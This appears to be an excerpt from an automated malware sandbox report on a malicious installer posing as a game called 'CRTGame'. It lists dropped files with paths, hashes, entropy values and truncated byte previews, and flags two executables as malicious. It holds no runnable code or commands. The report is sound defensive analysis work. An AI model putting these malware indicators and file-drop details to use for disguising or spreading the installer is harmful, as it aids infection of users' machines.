                                                                        MD5:DB191B89F4D015B1B9AEE99AC78A7E65
                                                                        SHA1:8DAC370768E7480481300DD5EBF8BA9CE36E11E3
                                                                        SHA-256:38A75F86DB58EB8D2A7C0213861860A64833C78F59EFF19141FFD6C3B6E28835
                                                                        SHA-512:A27E26962B43BA84A5A82238556D06672DCF17931F866D24E6E8DCE88F7B30E80BA38B071943B407A7F150A57CF1DA13D2137C235B902405BEDBE229B6D03784
                                                                        Malicious:false
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.j..f...f...f..]....f..]...f..]....f......f......f......f......f..]....f...f..]f......f......f......f...f...f......f..Rich.f..........PE..L...y.._...........!................@........ ...............................@..........................................d...$...(.......h.................... ......................................(...@............ ..8............................text...q........................... ..`asmcode.>$.......&.................. ..`.rdata..B.... ......................@..@.data...............................@....rsrc...h...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:modified
                                                                        Size (bytes):2199540
                                                                        Entropy (8bit):6.34382356471681
                                                                        Encrypted:false
                                                                        SSDEEP:24576:vWtUNVKKo/Ji9iOu/6fVTC75GvMQ5HwTQKmMEV7anImzSVG61jZJ+WFchgsvKIgX:+t0Z590/6o75QHW7mMwmzialW7R5Z/h
                                                                        MD5:BB0124F16D88C4EC1FCFD9E524A5B921
                                                                        SHA1:5017DC7277DBC5BB0B6F8428E4FF72603E3A370B
                                                                        SHA-256:59495C6E79C301F767F3D336050FB9927826F0AE972D634D395F5B44D7280A09
                                                                        SHA-512:4BE3E838FB41CD4D01A12B639CDCB93DF94DEEC0DEBD2593C53BBFE977DAF5BCB9E3F97F6C47D33E76AEA12AE2F9224F27652DFB5B5A69F53D201184766FFF91
                                                                        Malicious:true
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k.....................r.......................................6.......Rich............................PE..L.....ue.................@...................P....@...........................!......."......................................Y..P........G...........................................................................P...............................text....;.......@.................. ..`.rdata.......P... ...P..............@..@.data....P...p...0...p..............@....rsrc....G.......P..................@..@.hsave....... ......................`...................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):2199540
                                                                        Entropy (8bit):6.343823195460407
                                                                        Encrypted:false
                                                                        SSDEEP:24576:EWtUNVKKo/Ji9iOu/6fVTC75GvMQ5HwTQKmMEV7anImzSVG61jZJ+WFchgsvKIgX:zt0Z590/6o75QHW7mMwmzialW7R5Z/h
                                                                        MD5:EB732B105CEAE8D6D08B309621C239F5
                                                                        SHA1:B673ABD9B9A11193DE071C3C98B372A0EEFD2C50
                                                                        SHA-256:839DC7452F0E0FD9328B4A19800F630B29AFFDF7D7F30A93E3F19364CB30A1ED
                                                                        SHA-512:F8BC354CA40CC6F47535E60D66B1907A711D28DC3C5822CFD1F461C6173D171358B8BD0FCC912A0AB74CA4046313703D451167544F79A7C182221CF5FEFD4691
                                                                        Malicious:false
                                                                        Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k.....................r.......................................6.......Rich............................PE..L.....ue.................@...................P....@...........................!......."......................................Y..P........G...........................................................................P...............................text....;.......@.................. ..`.rdata.......P... ...P..............@..@.data....P...p...0...p..............@....rsrc....G.......P..................@..@.hsave....... ......................`...................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:IFF data
                                                                        Category:dropped
                                                                        Size (bytes):1716
                                                                        Entropy (8bit):4.781797138644031
                                                                        Encrypted:false
                                                                        SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
                                                                        MD5:257D1BF38FA7859FFC3717EF36577C04
                                                                        SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
                                                                        SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
                                                                        SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
                                                                        Malicious:false
                                                                        Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1825
                                                                        Entropy (8bit):5.088030483893024
                                                                        Encrypted:false
                                                                        SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                        MD5:992C00BEAB194CE392117BB419F53051
                                                                        SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                        SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                        SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                        Malicious:false
                                                                        Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:IFF data
                                                                        Category:dropped
                                                                        Size (bytes):1716
                                                                        Entropy (8bit):4.781797138644031
                                                                        Encrypted:false
                                                                        SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
                                                                        MD5:257D1BF38FA7859FFC3717EF36577C04
                                                                        SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
                                                                        SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
                                                                        SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
                                                                        Malicious:false
                                                                        Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1825
                                                                        Entropy (8bit):5.088030483893024
                                                                        Encrypted:false
                                                                        SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                        MD5:992C00BEAB194CE392117BB419F53051
                                                                        SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                        SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                        SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                        Malicious:false
                                                                        Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:IFF data
                                                                        Category:dropped
                                                                        Size (bytes):1716
                                                                        Entropy (8bit):4.781797138644031
                                                                        Encrypted:false
                                                                        SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
                                                                        MD5:257D1BF38FA7859FFC3717EF36577C04
                                                                        SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
                                                                        SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
                                                                        SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
                                                                        Malicious:false
                                                                        Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1825
                                                                        Entropy (8bit):5.088030483893024
                                                                        Encrypted:false
                                                                        SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                        MD5:992C00BEAB194CE392117BB419F53051
                                                                        SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                        SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                        SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                        Malicious:false
                                                                        Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):714526
                                                                        Entropy (8bit):6.5053900039496435
                                                                        Encrypted:false
                                                                        SSDEEP:12288:fRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExycy:5ObekrkfohrP337uzHnA6cHiiHEVVg6i
                                                                        MD5:3910EA485B6F67ECAF6B34DDB4BE5980
                                                                        SHA1:85C397003697A6DCDBCAD43B2C7F8336BE99CA5F
                                                                        SHA-256:FD2C46551A5A55A0C2B5A12AE2385BE68681AE8E8DFA1E0C3AD686057795CC45
                                                                        SHA-512:65977C0A6E1E21D056080CCC733C303880141AF0E585275041274D6D41742FDCEDE4B3369D56A0D0C4B2A5F3AC734E48234110B8D81C43ADA5CBC10619B0DB45
                                                                        Malicious:false
                                                                        Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d..........lp............@..............................................@...............................%..................................................................................................................CODE.....b.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:InnoSetup Log CRTGame, version 0x30, 8021 bytes, 445817\user, "C:\Program Files (x86)\CRTGame"
                                                                        Category:dropped
                                                                        Size (bytes):8021
                                                                        Entropy (8bit):5.052811074826732
                                                                        Encrypted:false
                                                                        SSDEEP:96:G3N8WVPpbbK+T4hlOIhlXWx4cVSQs0Ln9DE2VYW4G:G98WVPp1+QIhs+cVSQ1n/m4
                                                                        MD5:3BF5D8BA467366603216E50DBBA55412
                                                                        SHA1:F525EB1F0F9B3645F27ABF2EC1615C882BBE0F4E
                                                                        SHA-256:9BA02EAC39943E350D0C4D23B0DBB45D2B6CE215F40AE6AFD6C8BE40E6C299DD
                                                                        SHA-512:5548C98EF6B80BA6E31A1098B7F6178C77268A35D857985A97274D0AFC8EAE972D130046B8E2727BEC49198F58CAF30938D1A3AC0EAA77544E2B40664B8814E7
                                                                        Malicious:false
                                                                        Preview:Inno Setup Uninstall Log (b)....................................CRTGame.........................................................................................................................CRTGame.........................................................................................................................0...G...U...%................................................................................................................Q.>........l..X......?....445817.user.C:\Program Files (x86)\CRTGame.............;.O.. ..........h.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...............................o...........!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.dll.GetSystemMet
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):714526
                                                                        Entropy (8bit):6.5053900039496435
                                                                        Encrypted:false
                                                                        SSDEEP:12288:fRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExycy:5ObekrkfohrP337uzHnA6cHiiHEVVg6i
                                                                        MD5:3910EA485B6F67ECAF6B34DDB4BE5980
                                                                        SHA1:85C397003697A6DCDBCAD43B2C7F8336BE99CA5F
                                                                        SHA-256:FD2C46551A5A55A0C2B5A12AE2385BE68681AE8E8DFA1E0C3AD686057795CC45
                                                                        SHA-512:65977C0A6E1E21D056080CCC733C303880141AF0E585275041274D6D41742FDCEDE4B3369D56A0D0C4B2A5F3AC734E48234110B8D81C43ADA5CBC10619B0DB45
                                                                        Malicious:false
                                                                        Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d..........lp............@..............................................@...............................%..................................................................................................................CODE.....b.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................
                                                                        Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2199540
                                                                        Entropy (8bit):6.34382356471681
                                                                        Encrypted:false
                                                                        SSDEEP:24576:vWtUNVKKo/Ji9iOu/6fVTC75GvMQ5HwTQKmMEV7anImzSVG61jZJ+WFchgsvKIgX:+t0Z590/6o75QHW7mMwmzialW7R5Z/h
                                                                        MD5:BB0124F16D88C4EC1FCFD9E524A5B921
                                                                        SHA1:5017DC7277DBC5BB0B6F8428E4FF72603E3A370B
                                                                        SHA-256:59495C6E79C301F767F3D336050FB9927826F0AE972D634D395F5B44D7280A09
                                                                        SHA-512:4BE3E838FB41CD4D01A12B639CDCB93DF94DEEC0DEBD2593C53BBFE977DAF5BCB9E3F97F6C47D33E76AEA12AE2F9224F27652DFB5B5A69F53D201184766FFF91
                                                                        Malicious:false
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k.....................r.......................................6.......Rich............................PE..L.....ue.................@...................P....@...........................!......."......................................Y..P........G...........................................................................P...............................text....;.......@.................. ..`.rdata.......P... ...P..............@..@.data....P...p...0...p..............@....rsrc....G.......P..................@..@.hsave....... ......................`...................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):4
                                                                        Entropy (8bit):0.8112781244591328
                                                                        Encrypted:false
                                                                        SSDEEP:3:y:y
                                                                        MD5:D83A262FC46BD9C9D48FF14208EF17BC
                                                                        SHA1:D742C6B01FE4B5D54EE43A031637753232284E8B
                                                                        SHA-256:40D95A7C7F1655A0070DDF3CE81EB83C0E88AB92766B85E6A0BB98503896E036
                                                                        SHA-512:21C38C9D3047923AAF00A89E5824D8B3FD8C378710856293FC3C26B88D4B73F00D9EB4C857F66B12A5943CAE59EC7644DCD6B42D0FD4A240EC20425002EADF6C
                                                                        Malicious:false
                                                                        Preview:3...
                                                                        Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):128
                                                                        Entropy (8bit):2.862976125752538
                                                                        Encrypted:false
                                                                        SSDEEP:3:1k/QnTzXD9iIgAnDTa3pkHil/:11TzXD9iIxPa3pkHit
                                                                        MD5:785BB7F0B0CEF59C39B9F5E21CD2FD04
                                                                        SHA1:1E1FFDEE1584A00BDE18BD7BD19C02988301C250
                                                                        SHA-256:90B35EC0C6B41ACEC2C9BB51CDDCB6339FB035C222766A4CA4CBB15B7A7D8853
                                                                        SHA-512:6D2449E111F7F059734960B83B0B090A7239EE2D93EB70F839ECDDAA640658B90667F123CFB4FE8E0F5DC0A854A47B62AA2FCAF971D08B9118CAC840DBF999EB
                                                                        Malicious:false
                                                                        Preview:3e0f25005939fee32fa196d33e7a2b8f6ce30e1128f6a30e537a9ba072d59a73................................................................
                                                                        Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                        File Type:MPEG-4 LOAS
                                                                        Category:dropped
                                                                        Size (bytes):8
                                                                        Entropy (8bit):2.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:1n:1
                                                                        MD5:B03076BE8631D2A185D48B557B040715
                                                                        SHA1:C91360E2020DBF96257AD1E43FED9CBF91AF0C53
                                                                        SHA-256:34D23B5A6F324555AFECC48DD34AC3BD1D3B43A43DE40AF0C9F7DE1B28473201
                                                                        SHA-512:05B848BC891BBE4D63958CC0EC9999979E37E17B7B38B0045496272AFF57DA88C6E28355933E1C1A8C025DC7B73532FFE2E3484FD7A77A706517F81CB9DE304F
                                                                        Malicious:false
                                                                        Preview:V.\g....
                                                                        Process:C:\Users\user\Desktop\j9htknb7BQ.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):704000
                                                                        Entropy (8bit):6.4972640482038075
                                                                        Encrypted:false
                                                                        SSDEEP:12288:XRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExyc:BObekrkfohrP337uzHnA6cHiiHEVVg6X
                                                                        MD5:F448D7F4B76E5C9C3A4EAFF16A8B9B73
                                                                        SHA1:31808F1FFA84C954376975B7CDB0007E6B762488
                                                                        SHA-256:7233B85EB0F8B3AA5CAE3811D727AA8742FEC4D1091C120A0FE15006F424CC49
                                                                        SHA-512:F8197458CD2764C0B852DAC34F9BF361110A7DC86903024A97C7BCD3F77B148342BF45E3C2B60F6AF8198AE3B83938DBAAD5E007D71A0F88006F3A0618CF36F4
                                                                        Malicious:true
                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d..........lp............@..............................................@...............................%..................................................................................................................CODE.....b.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):4096
                                                                        Entropy (8bit):4.026670007889822
                                                                        Encrypted:false
                                                                        SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
                                                                        MD5:0EE914C6F0BB93996C75941E1AD629C6
                                                                        SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
                                                                        SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
                                                                        SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
                                                                        Malicious:false
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................|.......|.......|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2560
                                                                        Entropy (8bit):2.8818118453929262
                                                                        Encrypted:false
                                                                        SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                        MD5:A69559718AB506675E907FE49DEB71E9
                                                                        SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                        SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                        SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                        Malicious:false
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):19456
                                                                        Entropy (8bit):5.8975201046735535
                                                                        Encrypted:false
                                                                        SSDEEP:384:ED4NeA1PrXPBdHCNPJEQkWybd0oBSRnAZ806OSDrgtOFXqYUPYNQLJ/k+9tPEBer:64NHPfHCs6GNOpiM+RFjFyzcN23A
                                                                        MD5:3ADAA386B671C2DF3BAE5B39DC093008
                                                                        SHA1:067CF95FBDB922D81DB58432C46930F86D23DDED
                                                                        SHA-256:71CD2F5BC6E13B8349A7C98697C6D2E3FCDEEA92699CEDD591875BEA869FAE38
                                                                        SHA-512:BBE4187758D1A69F75A8CCA6B3184E0C20CF8701B16531B55ED4987497934B3C9EF66ECD5E6B83C7357F69734F1C8301B9F82F0A024BB693B732A2D5760FD303
                                                                        Malicious:false
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P.......................................................................P.......P..(............................p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):6144
                                                                        Entropy (8bit):4.215994423157539
                                                                        Encrypted:false
                                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                        MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                        SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                        SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                        SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                        Malicious:false
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):23312
                                                                        Entropy (8bit):4.596242908851566
                                                                        Encrypted:false
                                                                        SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                        MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                        SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                        SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                        SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                        Malicious:false
